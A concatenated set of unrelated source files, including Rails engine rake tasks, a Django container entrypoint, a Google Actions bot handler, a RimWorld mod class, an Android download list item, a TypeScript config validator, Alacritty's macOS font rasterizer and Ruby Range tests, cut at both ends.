      # redefine_task (defined above) replaces the stock rdoc task so every
      # file under the plugin's code paths is documented.
      Rake::Task.redefine_task(plugin => :environment) do
        plugin_base = RAILS_ROOT + "/vendor/plugins/#{plugin}"
        options = []
        files = Rake::FileList.new
        options << "-o doc/plugins/#{plugin}"
        options << "--title '#{plugin.titlecase} Plugin Documentation'"
        options << '--line-numbers' << '--inline-source'
        options << '-T html'

        # Include every file in the plugin's code_paths (see Plugin#code_paths)
        if Engines.plugins[plugin]
          files.include("#{plugin_base}/{#{Engines.plugins[plugin].code_paths.join(",")}}/**/*.rb")
        end

        # A README doubles as the generated documentation's main page.
        if File.exists?("#{plugin_base}/README")
          files.include("#{plugin_base}/README")
          options << "--main '#{plugin_base}/README'"
        end
        files.include("#{plugin_base}/CHANGELOG") if File.exists?("#{plugin_base}/CHANGELOG")

        if files.empty?
          puts "No source files found in #{plugin_base}. No documentation will be generated."
        else
          options << files.to_s
          sh %(rdoc #{options * ' '})
        end
      end
    end
  end
end
namespace :test do
  # Printed before multi-plugin runs because engines' code-mixing features
  # can make plugin test suites interfere with one another.
  task :warn_about_multiple_plugin_testing_with_engines do
    puts %{-~============== A Moste Polite Warninge ===========================~-
    You may experience issues testing multiple plugins at once when using
    the code-mixing features that the engines plugin provides. If you do
    experience any problems, please test plugins individually, i.e.
    $ rake test:plugins PLUGIN=my_plugin
    or use the per-type plugin test tasks:
    $ rake test:plugins:units
    $ rake test:plugins:functionals
    $ rake test:plugins:integration
    $ rake test:plugins:all
    Report any issues on http://dev.rails-engines.org. Thanks!
    -~===============( ... as you were ... )============================~-}
  end

  namespace :plugins do
    desc "Run the plugin tests in vendor/plugins/**/test (or specify with PLUGIN=name)"
    task :all => [:warn_about_multiple_plugin_testing_with_engines,
                  :units, :functionals, :integration]

    desc "Run all plugin unit tests"
    Rake::TestTask.new(:units => :setup_plugin_fixtures) do |t|
      t.pattern = "vendor/plugins/#{ENV['PLUGIN'] || "**"}/test/unit/**/*_test.rb"
      t.verbose = true
    end

    desc "Run all plugin functional tests"
    Rake::TestTask.new(:functionals => :setup_plugin_fixtures) do |t|
      t.pattern = "vendor/plugins/#{ENV['PLUGIN'] || "**"}/test/functional/**/*_test.rb"
      t.verbose = true
    end

    desc "Integration test engines"
    Rake::TestTask.new(:integration => :setup_plugin_fixtures) do |t|
      t.pattern = "vendor/plugins/#{ENV['PLUGIN'] || "**"}/test/integration/**/*_test.rb"
      t.verbose = true
    end

    desc "Mirrors plugin fixtures into a single location to help plugin tests"
    task :setup_plugin_fixtures => :environment do
      Engines::Testing.setup_plugin_fixtures
    end

    # Patch the default plugin testing task to have setup_plugin_fixtures as a prerequisite
    Rake::Task["test:plugins"].prerequisites << "test:plugins:setup_plugin_fixtures"
  end
end
|
#!/usr/bin/env bash
# Entrypoint: collect static assets, apply migrations, then serve the ASGI app.
# BUG FIX: abort on the first failing command, on undefined variables, and on
# failures inside pipelines -- a half-migrated deploy must not start serving.
set -euo pipefail

echo -e "\e[94m Collecting static...\e[0m"
python manage.py collectstatic --noinput --clear

echo -e "\e[94m Making migrations...\e[0m"
# NOTE(review): running makemigrations at container start is unusual --
# confirm migrations aren't meant to be generated at build time and committed.
python manage.py makemigrations
python manage.py migrate

echo -e "\e[92m Starting service...\e[0m"
# Serve over a unix domain socket (expected to be fronted by a reverse proxy).
uvicorn conf.asgi:application --uds /uvicorn_socket/uvicorn.socket
|
const gactions = require('actions-on-google')
const _ = require('lodash')
const Session = require('newbot-formats/session/gactions')
const output = require('../output')
module.exports = function ({
app,
converse,
settings
}) {
const propClientId = 'platforms.gactions.signin.clientId'
const clientId = _.get(settings, propClientId)
const action = gactions.actionssdk({
clientId
})
const handle = (conv, input, {
type = 'exec',
signin,
userData
} = {}) => {
const _converse = global.converse || converse
const session = new Session(gactions, conv)
const userId = session.userId()
const options = output(session, settings)
if (type == 'exec') {
return _converse.exec(input, userId, options)
}
return _converse.event(input, {
profile: userData,
signin
}, userId, options)
}
const handleOption = (conv, params, option) => {
return handle(conv, option)
}
const handleSignin = (conv, params, signin) => {
const propName = 'platforms.gactions.signin.event'
const eventName = _.get(settings, propName)
if (!eventName) {
throw '[Gactions] Please, add event name in "' + propName + '" property in "newbot.config.js"'
}
if (!clientId) {
throw '[Gactions] Please, add client Id "' + propClientId + '" property in "newbot.config.js"'
}
return handle(conv, eventName, {
type: 'event',
signin,
userData: conv.user.profile.payload
})
}
action.intent('actions.intent.MAIN', handle)
action.intent('actions.intent.TEXT', handle)
action.intent('actions.intent.OPTION', handleOption)
action.intent('actions.intent.SIGN_IN', handleSignin)
app.post(settings.path || '/gactions', action)
}
|
using System.Linq;
using RimWorld;
using Verse;
namespace MoreThanCapable
{
public class ThoughtWorker_AssignedToBadWork : ThoughtWorker
{
protected override ThoughtState CurrentStateInternal(Pawn p)
{
if (!p.health.hediffSet.HasHediff(def.hediff)) {
return false;
}
var whine = (Hediff_Whine) p.health.hediffSet.GetFirstHediffOfDef(def.hediff);
float severity = whine.Severity;
if (whine.peaked) {
if (severity > 0f) {
return ThoughtState.ActiveAtStage(def.stages.Count - 1);
}
return false;
}
if (severity > 0.4f) {
return ThoughtState.ActiveAtStage(4);
}
if (severity > 0.3f) {
return ThoughtState.ActiveAtStage(3);
}
if (severity > 0.2f) {
return ThoughtState.ActiveAtStage(2);
}
if (severity > 0.1f) {
return ThoughtState.ActiveAtStage(1);
}
if (severity > 0f) {
return ThoughtState.ActiveAtStage(0);
}
return false;
}
}
}
|
package io.github.qkcoder.hermesdownloadersample
import android.graphics.Color
import android.graphics.drawable.GradientDrawable
import android.view.View
import android.widget.ImageView
import android.widget.ProgressBar
import android.widget.TextView
import com.bumptech.glide.Glide
import com.mikepenz.fastadapter.FastAdapter
import com.mikepenz.fastadapter.items.AbstractItem
/**
 * @author tq
 * @email qkcoder@aliyun.com
 * @date 2021/4/29 11:26 下午
 * @desc List item for the download sample: title, progress bar, download
 *       button and a cached-image preview.
 */
class DownloadItem : AbstractItem<DownloadItem.ViewHolder>() {
    // Download progress percentage, 0..100; 100 means the file is cached.
    private var progress: Int = 0
    private var url: String? = null
    private var name: String? = null
    private var cachePath: String? = null

    override val layoutRes: Int
        get() = R.layout.item_download_list

    override val type: Int
        get() = 0

    fun getUrl(): String? = url

    fun setProgress(progress: Int) {
        this.progress = progress
    }

    fun getProgress(): Int = progress

    fun setCachePath(cachePath: String?) {
        this.cachePath = cachePath
    }

    fun getCachePath(): String? = cachePath

    // Fluent setters used when (re)binding list data.
    fun with(progress: Int): DownloadItem = apply {
        this.progress = progress
    }

    fun with(url: String, name: String): DownloadItem = apply {
        this.url = url
        this.name = name
    }

    override fun getViewHolder(v: View): ViewHolder = ViewHolder(v)

    class ViewHolder(view: View) : FastAdapter.ViewHolder<DownloadItem>(view) {
        private val mTitleView = view.findViewById<TextView>(R.id.title_item_download_list)
        private val mProgressBar: ProgressBar =
            view.findViewById(R.id.progressbar_item_download_list)
        val mDownloadBtn: TextView = view.findViewById(R.id.btn_item_download_list)
        private val mImgView: ImageView = view.findViewById(R.id.img_item_download_list)

        init {
            view.background = roundedBackground("#f5f5f5")
            mDownloadBtn.background = roundedBackground("#F63939")
        }

        override fun bindView(item: DownloadItem, payloads: List<Any>) {
            mProgressBar.progress = item.progress
            mTitleView.text = item.name
            if (item.progress >= 100) {
                mDownloadBtn.isEnabled = false
                mDownloadBtn.text = "已下载"
                showPreviewIfCached(item)
            } else {
                mDownloadBtn.isEnabled = true
                mDownloadBtn.text = if (item.progress == 0) "下载" else "下载中"
                mImgView.visibility = View.GONE
            }
        }

        // Show the cached image, but only once per adapter position: the
        // view's tag remembers which position already triggered a Glide load.
        private fun showPreviewIfCached(item: DownloadItem) {
            val hasCache = !item.getCachePath().isNullOrEmpty()
            val positionTag = mImgView.getTag(R.id.download_item_tag)
            if (positionTag is Int) {
                if (hasCache && positionTag == absoluteAdapterPosition) {
                    mImgView.visibility = View.VISIBLE
                    Glide.with(mImgView.context).load(item.getCachePath()).into(mImgView)
                } else {
                    mImgView.visibility = View.GONE
                }
            } else {
                if (hasCache) {
                    mImgView.visibility = View.VISIBLE
                    Glide.with(mImgView.context).load(item.getCachePath()).into(mImgView)
                    mImgView.setTag(R.id.download_item_tag, absoluteAdapterPosition)
                } else {
                    mImgView.visibility = View.GONE
                }
            }
        }

        override fun unbindView(item: DownloadItem) {
        }

        // Rounded-rect background used for both the row and the button;
        // previously duplicated as createCornerBg/createCornerBg2.
        private fun roundedBackground(colorHex: String): GradientDrawable =
            GradientDrawable().apply {
                shape = GradientDrawable.RECTANGLE
                setColor(Color.parseColor(colorHex))
                cornerRadius = 20f
            }
    }
}
|
import { IExclude } from "../../interface/config/IExclude.ts";
import { arrayGetUnique } from "../../util/array/get/unique.ts";
import { arrayIsEmpty } from "../../util/array/is/empty.ts";
import { isRegExp } from "../../util/is/regexp.ts";
import { isString } from "../../util/is/string.ts";
import { jsonStringify } from "../../util/json/stringify.ts";
/**
* @name excludeConfig
* @throws TypeError
* @param {Array.<string|RegExp>} propertiesToExclude
* @returns {Array.<string|RegExp>}
*/
export function excludeConfig(propertiesToExclude: IExclude): IExclude {
  if (!Array.isArray(propertiesToExclude)) {
    throw new TypeError("'Exclude' should be an array");
  }

  if (arrayIsEmpty(propertiesToExclude)) {
    return [];
  }

  // De-duplicate first, then validate: every entry must be a string or RegExp.
  return arrayGetUnique(propertiesToExclude).map((value) => {
    if (isString(value) || isRegExp(value)) {
      return value;
    }
    throw new TypeError(
      `'Exclude' expect array of strings or regular expressions. Value: '${jsonStringify(value)}'.`,
    );
  });
}
|
// Copyright 2016 Joe Wilm, The Alacritty Project Contributors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
//! Font rendering based on CoreText
//!
//! TODO error handling... just search for unwrap.
#![allow(improper_ctypes)]
use std::collections::HashMap;
use std::ptr;
use ::{Slant, Weight, Style};
use core_foundation::base::TCFType;
use core_foundation::string::{CFString, CFStringRef};
use core_foundation::array::CFIndex;
use core_foundation_sys::string::UniChar;
use core_graphics::base::kCGImageAlphaPremultipliedFirst;
use core_graphics::base::CGFloat;
use core_graphics::color_space::CGColorSpace;
use core_graphics::context::{CGContext, CGContextRef};
use core_graphics::font::{CGFont, CGFontRef, CGGlyph};
use core_graphics::geometry::{CGPoint, CGRect, CGSize};
use core_text::font::{CTFont, new_from_descriptor as ct_new_from_descriptor};
use core_text::font_collection::create_for_family;
use core_text::font_collection::get_family_names as ct_get_family_names;
use core_text::font_descriptor::kCTFontDefaultOrientation;
use core_text::font_descriptor::kCTFontHorizontalOrientation;
use core_text::font_descriptor::kCTFontVerticalOrientation;
use core_text::font_descriptor::{CTFontDescriptor, CTFontDescriptorRef, CTFontOrientation};
use core_text::font_descriptor::SymbolicTraitAccessors;
use libc::{size_t, c_int};
use euclid::point::Point2D;
use euclid::rect::Rect;
use euclid::size::Size2D;
use super::{FontDesc, RasterizedGlyph, Metrics, FontKey, GlyphKey};
pub mod cg_color;
use self::cg_color::{CGColorRef, CGColor};
pub mod byte_order;
use self::byte_order::kCGBitmapByteOrder32Host;
use self::byte_order::extract_rgb;
use super::Size;
/// Font descriptor
///
/// The descriptor provides data about a font and supports creating a font.
#[derive(Debug)]
pub struct Descriptor {
    family_name: String,
    font_name: String,
    style_name: String,
    display_name: String,
    font_path: String,

    // Underlying Core Text descriptor; `to_font` instantiates a CTFont from it.
    ct_descriptor: CTFontDescriptor
}
/// Rasterizer, the main type exported by this package
///
/// Given a fontdesc, can rasterize fonts.
pub struct Rasterizer {
    fonts: HashMap<FontKey, Font>,            // loaded fonts, by key
    keys: HashMap<(FontDesc, Size), FontKey>, // cache: (desc, size) -> key
    device_pixel_ratio: f32,                  // scales point sizes to device pixels
    use_thin_strokes: bool,                   // forwarded to glyph rasterization
}
/// Errors occurring when using the core text rasterizer
#[derive(Debug)]
pub enum Error {
    /// Tried to rasterize a glyph but it was not available
    MissingGlyph(char),

    /// Couldn't find font matching description
    MissingFont(FontDesc),

    /// Requested an operation with a FontKey that isn't known to the rasterizer
    FontNotLoaded,
}
// Short static descriptions for each error case.
impl ::std::error::Error for Error {
    fn description(&self) -> &str {
        match *self {
            Error::MissingGlyph(ref _c) => "couldn't find the requested glyph",
            Error::MissingFont(ref _desc) => "couldn't find the requested font",
            Error::FontNotLoaded => "tried to operate on font that hasn't been loaded",
        }
    }
}
// User-facing messages including the offending char / font description.
impl ::std::fmt::Display for Error {
    fn fmt(&self, f: &mut ::std::fmt::Formatter) -> ::std::fmt::Result {
        match *self {
            Error::MissingGlyph(ref c) => {
                write!(f, "Glyph not found for char {:?}", c)
            },
            Error::MissingFont(ref desc) => {
                write!(f, "Couldn't find a font with {}\
                       \n\tPlease check the font config in your alacritty.yml.", desc)
            },
            Error::FontNotLoaded => {
                f.write_str("Tried to use a font that hasn't been loaded")
            }
        }
    }
}
impl ::Rasterize for Rasterizer {
    type Err = Error;

    /// Build a rasterizer. The DPI arguments are unused on this backend;
    /// scaling is driven entirely by `device_pixel_ratio`.
    fn new(_dpi_x: f32, _dpi_y: f32, device_pixel_ratio: f32, use_thin_strokes: bool) -> Result<Rasterizer, Error> {
        // BUG FIX: removed a leftover debug `println!` that dumped
        // device_pixel_ratio to stdout on every construction.
        Ok(Rasterizer {
            fonts: HashMap::new(),
            keys: HashMap::new(),
            device_pixel_ratio: device_pixel_ratio,
            use_thin_strokes: use_thin_strokes,
        })
    }

    /// Get metrics for font specified by FontKey
    fn metrics(&self, key: FontKey, _size: Size) -> Result<Metrics, Error> {
        // NOTE size is not needed here since the font loaded already contains
        // it. It's part of the API due to platform differences.
        let font = self.fonts
            .get(&key)
            .ok_or(Error::FontNotLoaded)?;

        Ok(font.metrics())
    }

    /// Load the font matching `desc` at `size`, reusing a cached key when the
    /// same (desc, size) pair was loaded before.
    fn load_font(&mut self, desc: &FontDesc, size: Size) -> Result<FontKey, Error> {
        self.keys
            .get(&(desc.to_owned(), size))
            .map(|k| Ok(*k))
            .unwrap_or_else(|| {
                let font = self.get_font(desc, size)?;
                let key = FontKey::next();

                self.fonts.insert(key, font);
                self.keys.insert((desc.clone(), size), key);

                Ok(key)
            })
    }

    /// Get rasterized glyph for given glyph key
    fn get_glyph(&mut self, glyph: &GlyphKey) -> Result<RasterizedGlyph, Error> {
        // Scale the requested point size by the device pixel ratio before
        // rasterizing.
        let scaled_size = self.device_pixel_ratio * glyph.size.as_f32_pts();
        self.fonts
            .get(&glyph.font_key)
            .ok_or(Error::FontNotLoaded)?
            .get_glyph(glyph.c, scaled_size as _, self.use_thin_strokes)
    }
}
impl Rasterizer {
fn get_specific_face(
&mut self,
desc: &FontDesc,
style: &str,
size: Size
) -> Result<Font, Error> {
let descriptors = descriptors_for_family(&desc.name[..]);
for descriptor in descriptors {
if descriptor.style_name == style {
// Found the font we want
let scaled_size = size.as_f32_pts() as f64 * self.device_pixel_ratio as f64;
let font = descriptor.to_font(scaled_size);
return Ok(font);
}
}
Err(Error::MissingFont(desc.to_owned()))
}
fn get_matching_face(
&mut self,
desc: &FontDesc,
slant: Slant,
weight: Weight,
size: Size
) -> Result<Font, Error> {
let bold = match weight {
Weight::Bold => true,
_ => false
};
let italic = match slant {
Slant::Normal => false,
_ => true,
};
let scaled_size = size.as_f32_pts() as f64 * self.device_pixel_ratio as f64;
let descriptors = descriptors_for_family(&desc.name[..]);
for descriptor in descriptors {
let font = descriptor.to_font(scaled_size);
if font.is_bold() == bold && font.is_italic() == italic {
// Found the font we want
return Ok(font);
}
}
Err(Error::MissingFont(desc.to_owned()))
}
fn get_font(&mut self, desc: &FontDesc, size: Size) -> Result<Font, Error> {
match desc.style {
Style::Specific(ref style) => self.get_specific_face(desc, style, size),
Style::Description { slant, weight } => {
self.get_matching_face(desc, slant, weight, size)
},
}
}
}
/// Specifies the intended rendering orientation of the font for obtaining glyph metrics
#[derive(Debug)]
pub enum FontOrientation {
    // Discriminants mirror the Core Text CTFontOrientation constants so the
    // enum can be cast directly when calling CT APIs.
    Default = kCTFontDefaultOrientation as isize,
    Horizontal = kCTFontHorizontalOrientation as isize,
    Vertical = kCTFontVerticalOrientation as isize,
}

impl Default for FontOrientation {
    fn default() -> FontOrientation {
        FontOrientation::Default
    }
}
/// A font
#[derive(Clone)]
pub struct Font {
    ct_font: CTFont, // Core Text handle: metrics and glyph lookup
    cg_font: CGFont, // Core Graphics handle derived from ct_font
}

// NOTE(review): asserts the CF font handles may move across threads; confirm
// against the core-foundation/core-text crates' thread-safety guarantees.
unsafe impl Send for Font {}
/// List all family names
pub fn get_family_names() -> Vec<String> {
    // CFArray of CFStringRef
    let names = ct_get_family_names();
    names
        .iter()
        .map(|name| {
            let family: CFString = unsafe { TCFType::wrap_under_get_rule(name as CFStringRef) };
            format!("{}", family)
        })
        .collect()
}
/// Get descriptors for family name
pub fn descriptors_for_family(family: &str) -> Vec<Descriptor> {
    // No collection for this family means there are no descriptors.
    let ct_collection = match create_for_family(family) {
        Some(collection) => collection,
        None => return Vec::new(),
    };

    // CFArray of CTFontDescriptorRef (i think)
    let ct_descriptors = ct_collection.get_descriptors();
    ct_descriptors
        .iter()
        .map(|descriptor| {
            let desc: CTFontDescriptor = unsafe {
                TCFType::wrap_under_get_rule(descriptor as CTFontDescriptorRef)
            };
            Descriptor {
                family_name: desc.family_name(),
                font_name: desc.font_name(),
                style_name: desc.style_name(),
                display_name: desc.display_name(),
                font_path: desc.font_path(),
                ct_descriptor: desc,
            }
        })
        .collect()
}
impl Descriptor {
    /// Create a Font from this descriptor at the given point `size`.
    pub fn to_font(&self, size: f64) -> Font {
        let ct_font = ct_new_from_descriptor(&self.ct_descriptor, size);
        Font {
            cg_font: ct_font.copy_to_CGFont(),
            ct_font: ct_font,
        }
    }
}
impl Font {
    /// Bounding rect of the glyph at `index` for the given orientation,
    /// converted from the CoreGraphics rect into a `Rect<f64>`.
    pub fn bounding_rect_for_glyph(
        &self,
        orientation: FontOrientation,
        index: u32
    ) -> Rect<f64> {
        let cg_rect = self.ct_font.get_bounding_rects_for_glyphs(
            orientation as CTFontOrientation,
            &[index as CGGlyph]
        );
        Rect::new(
            Point2D::new(cg_rect.origin.x, cg_rect.origin.y),
            Size2D::new(cg_rect.size.width, cg_rect.size.height),
        )
    }

    /// Aggregate metrics for the font.
    ///
    /// `average_advance` is the advance of the '0' glyph; line height is
    /// ascent + descent + leading, rounded half-up via `+ 0.5` then `floor`.
    pub fn metrics(&self) -> Metrics {
        let average_advance = self.glyph_advance('0');
        let ascent = self.ct_font.ascent() as f64;
        let descent = self.ct_font.descent() as f64;
        let leading = self.ct_font.leading() as f64;
        let line_height = (ascent + descent + leading + 0.5).floor();
        Metrics {
            average_advance: average_advance,
            line_height: line_height,
        }
    }

    /// Whether the face carries the bold symbolic trait.
    pub fn is_bold(&self) -> bool {
        self.ct_font.symbolic_traits().is_bold()
    }

    /// Whether the face carries the italic symbolic trait.
    pub fn is_italic(&self) -> bool {
        self.ct_font.symbolic_traits().is_italic()
    }

    /// Horizontal advance of a single character's glyph.
    ///
    /// NOTE(review): panics (unwrap) if the font has no glyph for
    /// `character` — acceptable for '0' in metrics(), but confirm no other
    /// callers pass arbitrary characters.
    fn glyph_advance(&self, character: char) -> f64 {
        let index = self.glyph_index(character).unwrap();
        let indices = [index as CGGlyph];
        self.ct_font.get_advances_for_glyphs(
            FontOrientation::Default as _,
            &indices[0],
            ptr::null_mut(),
            1
        )
    }

    /// Rasterize `character` into an RGB bitmap.
    ///
    /// Draws the glyph white-on-black into a CoreGraphics bitmap context and
    /// returns the pixels via `extract_rgb`. Zero-area glyphs (e.g. space)
    /// return an empty `RasterizedGlyph` with `c: ' '`. Fails with
    /// `Error::MissingGlyph` if the font lacks the character.
    pub fn get_glyph(&self, character: char, _size: f64, use_thin_strokes: bool) -> Result<RasterizedGlyph, Error> {
        let glyph_index = self.glyph_index(character)
            .ok_or(Error::MissingGlyph(character))?;
        // Compute integer raster bounds that fully cover the glyph's
        // (possibly fractional) bounding box.
        let bounds = self.bounding_rect_for_glyph(Default::default(), glyph_index);
        let rasterized_left = bounds.origin.x.floor() as i32;
        let rasterized_width =
            (bounds.origin.x - (rasterized_left as f64) + bounds.size.width).ceil() as u32;
        let rasterized_descent = (-bounds.origin.y).ceil() as i32;
        let rasterized_ascent = (bounds.size.height + bounds.origin.y).ceil() as i32;
        let rasterized_height = (rasterized_descent + rasterized_ascent) as u32;
        // Glyphs with no visible extent (whitespace) need no bitmap.
        if rasterized_width == 0 || rasterized_height == 0 {
            return Ok(RasterizedGlyph {
                c: ' ',
                width: 0,
                height: 0,
                top: 0,
                left: 0,
                buf: Vec::new()
            });
        }
        let mut cg_context = CGContext::create_bitmap_context(
            rasterized_width as usize,
            rasterized_height as usize,
            8, // bits per component
            rasterized_width as usize * 4, // 4 bytes per pixel (ARGB)
            &CGColorSpace::create_device_rgb(),
            kCGImageAlphaPremultipliedFirst | kCGBitmapByteOrder32Host
        );
        // Give the context an opaque, black background
        cg_context.set_rgb_fill_color(0.0, 0.0, 0.0, 1.0);
        let context_rect = CGRect::new(
            &CGPoint::new(0.0, 0.0),
            &CGSize::new(
                rasterized_width as f64,
                rasterized_height as f64
            )
        );
        cg_context.fill_rect(context_rect);
        // NOTE(review): 16 appears to select lighter font smoothing for
        // "thin strokes" — confirm against the private smoothing-style values.
        if use_thin_strokes {
            cg_context.set_font_smoothing_style(16);
        }
        // Enable every smoothing/subpixel knob for text-quality rendering.
        cg_context.set_allows_font_smoothing(true);
        cg_context.set_should_smooth_fonts(true);
        cg_context.set_allows_font_subpixel_quantization(true);
        cg_context.set_should_subpixel_quantize_fonts(true);
        cg_context.set_allows_font_subpixel_positioning(true);
        cg_context.set_should_subpixel_position_fonts(true);
        cg_context.set_allows_antialiasing(true);
        cg_context.set_should_antialias(true);
        // Set fill color to white for drawing the glyph
        cg_context.set_rgb_fill_color(1.0, 1.0, 1.0, 1.0);
        // Position the glyph origin so the whole bounding box lands inside
        // the bitmap: shift left edge to x=0 and baseline up by the descent.
        let rasterization_origin = CGPoint {
            x: -rasterized_left as f64,
            y: rasterized_descent as f64,
        };
        self.ct_font.draw_glyphs(&[glyph_index as CGGlyph],
                                 &[rasterization_origin],
                                 cg_context.clone());
        let rasterized_pixels = cg_context.data().to_vec();
        // Drop the alpha channel; the glyph coverage lives in the RGB bytes.
        let buf = extract_rgb(rasterized_pixels);
        Ok(RasterizedGlyph {
            c: character,
            left: rasterized_left,
            top: (bounds.size.height + bounds.origin.y).ceil() as i32,
            width: rasterized_width as i32,
            height: rasterized_height as i32,
            buf: buf,
        })
    }

    /// Look up the glyph index for `character`, or `None` if the font has
    /// no mapping for it.
    ///
    /// NOTE(review): `character as UniChar` keeps only one UTF-16 code unit,
    /// so characters outside the BMP are truncated here — confirm callers
    /// never pass astral-plane characters.
    fn glyph_index(&self, character: char) -> Option<u32> {
        let chars = [character as UniChar];
        let mut glyphs = [0 as CGGlyph];
        let res = self.ct_font.get_glyphs_for_characters(
            &chars[0],
            &mut glyphs[0],
            1 as CFIndex
        );
        if res {
            Some(glyphs[0] as u32)
        } else {
            None
        }
    }
}
/// Additional methods needed to render fonts for Alacritty
///
/// TODO upstream these into core_graphics crate
pub trait CGContextExt {
fn set_allows_font_subpixel_quantization(&self, bool);
fn set_should_subpixel_quantize_fonts(&self, bool);
fn set_allows_font_subpixel_positioning(&self, bool);
fn set_should_subpixel_position_fonts(&self, bool);
fn set_allows_antialiasing(&self, bool);
fn set_should_antialias(&self, bool);
fn fill_rect(&self, rect: CGRect);
fn set_font_smoothing_background_color(&self, color: CGColor);
fn show_glyphs_at_positions(&self, &[CGGlyph], &[CGPoint]);
fn set_font(&self, &CGFont);
fn set_font_size(&self, size: f64);
fn set_font_smoothing_style(&self, style: i32);
}
// Thin FFI wrappers: each method forwards its arguments to the matching
// CGContext* C function, passing the receiver's raw CGContextRef.
impl CGContextExt for CGContext {
    fn set_allows_font_subpixel_quantization(&self, allows: bool) {
        unsafe {
            CGContextSetAllowsFontSubpixelQuantization(self.as_concrete_TypeRef(), allows);
        }
    }
    fn set_should_subpixel_quantize_fonts(&self, should: bool) {
        unsafe {
            CGContextSetShouldSubpixelQuantizeFonts(self.as_concrete_TypeRef(), should);
        }
    }
    fn set_should_subpixel_position_fonts(&self, should: bool) {
        unsafe {
            CGContextSetShouldSubpixelPositionFonts(self.as_concrete_TypeRef(), should);
        }
    }
    fn set_allows_font_subpixel_positioning(&self, allows: bool) {
        unsafe {
            CGContextSetAllowsFontSubpixelPositioning(self.as_concrete_TypeRef(), allows);
        }
    }
    fn set_should_antialias(&self, should: bool) {
        unsafe {
            CGContextSetShouldAntialias(self.as_concrete_TypeRef(), should);
        }
    }
    fn set_allows_antialiasing(&self, allows: bool) {
        unsafe {
            CGContextSetAllowsAntialiasing(self.as_concrete_TypeRef(), allows);
        }
    }
    fn fill_rect(&self, rect: CGRect) {
        unsafe {
            CGContextFillRect(self.as_concrete_TypeRef(), rect);
        }
    }
    fn set_font_smoothing_background_color(&self, color: CGColor) {
        unsafe {
            CGContextSetFontSmoothingBackgroundColor(self.as_concrete_TypeRef(),
                                                     color.as_concrete_TypeRef());
        }
    }
    fn show_glyphs_at_positions(&self, glyphs: &[CGGlyph], positions: &[CGPoint]) {
        // One position per glyph is required by the C API.
        assert_eq!(glyphs.len(), positions.len());
        unsafe {
            CGContextShowGlyphsAtPositions(self.as_concrete_TypeRef(),
                                           glyphs.as_ptr(),
                                           positions.as_ptr(),
                                           glyphs.len());
        }
    }
    fn set_font(&self, font: &CGFont) {
        unsafe {
            CGContextSetFont(self.as_concrete_TypeRef(), font.as_concrete_TypeRef());
        }
    }
    fn set_font_size(&self, size: f64) {
        unsafe {
            CGContextSetFontSize(self.as_concrete_TypeRef(), size as CGFloat);
        }
    }
    fn set_font_smoothing_style(&self, style: i32) {
        unsafe {
            CGContextSetFontSmoothingStyle(self.as_concrete_TypeRef(), style as _);
        }
    }
}
// Raw CoreGraphics bindings not exposed by the core_graphics crate;
// linked from the ApplicationServices framework.
#[link(name = "ApplicationServices", kind = "framework")]
extern {
    fn CGContextSetAllowsFontSubpixelQuantization(c: CGContextRef, allows: bool);
    fn CGContextSetShouldSubpixelQuantizeFonts(c: CGContextRef, should: bool);
    fn CGContextSetAllowsFontSubpixelPositioning(c: CGContextRef, allows: bool);
    fn CGContextSetShouldSubpixelPositionFonts(c: CGContextRef, should: bool);
    fn CGContextSetAllowsAntialiasing(c: CGContextRef, allows: bool);
    fn CGContextSetShouldAntialias(c: CGContextRef, should: bool);
    fn CGContextFillRect(c: CGContextRef, r: CGRect);
    fn CGContextSetFontSmoothingBackgroundColor(c: CGContextRef, color: CGColorRef);
    fn CGContextShowGlyphsAtPositions(c: CGContextRef, glyphs: *const CGGlyph,
                                      positions: *const CGPoint, count: size_t);
    fn CGContextSetFont(c: CGContextRef, font: CGFontRef);
    fn CGContextSetFontSize(c: CGContextRef, size: CGFloat);
    fn CGContextSetFontSmoothingStyle(c: CGContextRef, style: c_int);
}
#[cfg(test)]
mod tests {
    /// Both test fonts ship with macOS, so these assertions should hold on
    /// any standard install.
    #[test]
    fn get_family_names() {
        let names = super::get_family_names();
        assert!(names.contains(&String::from("Menlo")));
        assert!(names.contains(&String::from("Monaco")));
    }

    #[test]
    fn get_descriptors_and_build_font() {
        let list = super::descriptors_for_family("Menlo");
        assert!(!list.is_empty());
        println!("{:?}", list);
        // Check to_font
        let fonts = list.iter()
            .map(|desc| desc.to_font(72.))
            .collect::<Vec<_>>();
        for font in fonts {
            // Get a glyph
            for c in &['a', 'b', 'c', 'd'] {
                // BUG FIX: `get_glyph` takes (char, size, use_thin_strokes);
                // the original call passed only two arguments and did not
                // compile. Thin strokes are irrelevant for this smoke test.
                let glyph = font.get_glyph(*c, 72., false).unwrap();
                // Render the glyph coverage as ASCII art for eyeballing.
                for row in 0..glyph.height {
                    for col in 0..glyph.width {
                        let index = ((glyph.width * 3 * row) + (col * 3)) as usize;
                        let value = glyph.buf[index];
                        let c = match value {
                            0...50 => ' ',
                            51...100 => '.',
                            101...150 => '~',
                            151...200 => '*',
                            201...255 => '#',
                            _ => unreachable!()
                        };
                        print!("{}", c);
                    }
                    print!("\n");
                }
            }
        }
    }
}
|
require 'facets/range/op_sub'

# Exercises the facets Range#- extension: subtracting a scalar or a range
# splits the receiver into a two-element [left, right] pair (with nil for an
# empty side) when the cut is interior, and collapses to a smaller array or
# [] when the subtrahend covers an edge or the whole range.
test_case Range do
  method :- do
    # Disabled: subtracting a non-numeric should raise, but the behaviour
    # is not pinned down yet.
    #test { lambda{ (1..10) - 'a' }.assert raise_error }
    test { ((1..10) - (5..5)).assert == [1..4, 6..10] }
    test { ((1..10) - 2).assert == [1, 3..10] }
    test { ((1..10) - 9).assert == [1..8, 10] }
    test { ((1..10) - 10).assert == [1..9, nil] }
    test { ((1..10) - 1).assert == [nil, 2..10] }
    test { ((1..10) - 11).assert == [1..10, nil] }
    test { ((1..10) - 12).assert == [1..10, nil] }
    test { ((1..10) - 0).assert == [nil, 1..10] }
    test { ((1..10) - -1).assert == [nil, 1..10] }
    test { ((1..10) - (4..6)).assert == [1..3, 7..10] }
    test { ((1..10) - (2..6)).assert == [1, 7..10] }
    test { ((1..10) - (4..9)).assert == [1..3, 10] }
    test { ((1..10) - (2..9)).assert == [1, 10] }
    test { ((1..10) - (2..11)).assert == [1] }
